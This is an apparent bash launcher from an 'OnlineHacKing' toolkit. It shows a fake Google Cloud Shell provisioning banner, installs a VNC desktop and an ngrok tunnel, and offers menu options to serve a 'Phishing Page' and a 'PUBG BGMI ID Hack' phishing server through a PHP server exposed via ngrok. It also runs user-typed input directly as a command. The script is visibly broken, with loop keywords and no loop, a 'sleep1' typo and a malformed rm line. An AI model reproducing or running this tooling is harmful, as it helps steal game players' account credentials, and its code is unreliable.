#!/bin/bash
echo ""
echo
echo ""
printf "\e[31m[\e[32m★\e[31m]\e[32m   Provisioning your Google Cloud Shell machine… Since you haven't used your Cloud Shell for a while, it may take some time to unarchive your disk. If you do not want to wait, you can enable ephemeral Cloud Shell.  \e[m "
echo ""
echo ""


php="$(ps -efw | grep php | grep -v grep | awk '{print $2}')"
ngrok="$(ps -efw | grep ngrok | grep -v grep | awk '{print $2}')"
kill -9 $php
kill -9 $ngrok
clear
bash OnlineHacKing/Logo.sh


                 echo -e $''   
                 read -p $'\e[1;91m[\e[0m\e[1;91m *** \e[0m\e[1;96m]\e[0m\e[1;96m  You Want to Linux Desktop Option  \e[1;91m  > : \e[0m' option
                 echo ""
		 if [ $option = 01 ] || [ $option = 1 ]
                 then 
                           
                           
			   echo ""
                           printf "\e[31m[\e[32m★\e[31m]\e[32m This Cloud Desktop VNC Server RDP \e[m "
                           echo ""
			   sudo apt install xfce4 xfce4-goodies xrdp -y
                           sudo apt install -y tightvncserver -y
                           echo ""
			   printf "\e[31m[\e[32m★\e[31m]\e[32m This Cloud Server is Ready \e[m "
			   echo ""
                           read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Start VNC Server \e[1;91m (Y/N) : \e[0m' option
                           echo""
                           echo""
                           echo""

                           if [[ $option == *'Y'* ]]; then
                           vncserver
                           exit
                           fi
                           if [[ $option == *'Y'* ]]; then
                           vncserver
                           exit
                           fi
			   echo -e " "
			   echo " "     
			   printf "\e[1;31m[\e[0m\e[1;92m02\e[0m\e[1;31m] \e[0m\e[1;37;41m Install Ngrok Latest Version \e[0m   "  
			   echo " "
			   echo -e " "
			   echo ""
			   wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip --no-check-certificate
			   unzip ngrok-stable-linux-amd64.zip
			   rm -rf unzip ngrok-stable-linux-amd64.zip
                           echo ""
			   echo ""
			   read -p $'\e[31m[\e[32m*\e[31m]\e[33m Enter The Ngrok Token [Ex. ./ngrok authtoken 1Y7IU ] : \e[0m' token
			   $token
			   sleep1
			   echo
			   ./ngrok tcp 4444
			   echo ""			   
                           read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Stop Server \e[1;91m (Y/N) : \e[0m' option
                           echo""
                           echo""
                           echo""

                           if [[ $option == *'y'* ]]; then
                           clear
                           vncserver -kill :1
                           vncserver -kill :2
                           exit
                           fi
                           if [[ $option == *'Y'* ]]; then
                           clear
                           vncserver -kill :1
                           vncserver -kill :2
                           exit
                           fi                           




	          break;
		  
                  elif [ $option = 02 ] || [ $option = 2 ]
	          then
	                          
                           echo ""
                           echo ""
                           printf "\e[31m[\e[32m★\e[31m]\e[32m This Phishing Page Only Pro User \e[m "
                           echo ""
                           echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m PHP SERVER NOW STARTING ... \e[0m  "
                           echo ""
                           sleep 3
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m NGROK SERVER NOW STARTING ... \e[0m  "
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 25
                           clear
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "[0-9a-z]*\.ngrok.io")
                           echo ""
                           echo ""
                           


                  break;
                  elif [ $option = 03 ] || [ $option = 3 ]
	          then
                           
                           echo ""
                           echo -e $" [\e[92m*\e[91m]\e[1;93m Setting up Online Hacking PUBG BGMI ID Hack Tool ... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m Fetching server ... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[1;92m*\e[1;91m]\e[1;93m Online Hacking PUBG BGMI Phishing Server Connect... \e[0m   "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m PHP SERVER NOW STARTING ... \e[0m  "
                           echo ""
                           sleep 3
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m NGROK SERVER NOW STARTING ... \e[0m  "
                           echo ""
			   

                   break;		  

                elif [ $option = 99 ]
	        then     
	                 echo
       	                 exit 
		break;
		      
                else 
		  
		         echo
		         echo -e "\e[92m[\e[94m!\e[92m]\e[92m Invalid option Try Again !! \e[m "
		         sleep 2
                         exit
		         fi
                         done
